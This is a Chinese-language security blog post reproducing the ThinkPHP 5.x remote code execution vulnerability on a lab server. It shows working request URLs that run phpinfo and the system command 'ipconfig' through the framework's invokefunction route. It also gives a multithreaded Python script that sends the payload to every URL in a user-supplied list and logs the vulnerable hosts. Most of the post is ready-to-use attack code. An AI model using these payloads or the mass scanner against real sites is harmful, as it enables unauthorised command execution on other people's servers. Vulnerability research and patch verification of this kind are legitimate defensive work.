QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

ThinkPHP V5.1命令执行漏洞复现

13 Jan 2019 » security

[TOC]

前言:

ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。

影响范围:

5.x < 5.1.31, <= 5.0.23

测试环境:

ThinkPHP V5.1.1

Apache/2.4.37 (Win32) OpenSSL/1.1.1

PHP version 7.2.12

复现:

访问:	http://10.211.55.7/tp5.1/public/index.php

img

输入:http://10.211.55.7/tp5.1/public/index.php?s=index/think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

img

访问:http://10.211.55.7/tp5.1/public/index.php?s=index/think\container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ipconfig

img

编写批量扫描脚本

# coding:utf-8

import threading
import time
import requests
import os


def scan(urls):

    """Python 3.x"""

    """ 批量检测是否存在Think PHP 5.1 命令执行漏洞 """

    if urls[-1] != '/':

        urls += '/'

    headers = {'user-aget': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'}

    payload = "/index.php?s=index/think\container/invokefunction&function=call_user_func_array&vars[0]=var_dump&vars[1][]=testpage"

    url = urls + payload

    try:

        req = requests.get(url=url,headers=headers,timeout=10)

        if "testpage" in req.text:

            print("[+] Ture url:{}".format(urls))

            print("{}".format(urls),file=open('save.txt','a'))

        else:

            print("[-] False url:{}".format(urls))

    except:

        pass

if __name__ == '__main__':

    while True:

        text = input('url.txt:')

        if os.path.exists(text):
            print('[+]{} existence'.format(text))
            break

        else:
            print('[-]{} not existence'.format(text))
            continue

    with open("{}".format(text), 'r') as e:

        for r in e.readlines():

            qc = "".join(r.split('\n'))

            # print(qc)

            t = threading.Thread(target=scan, args=(qc,))
            t.start()

            time.sleep(0.5)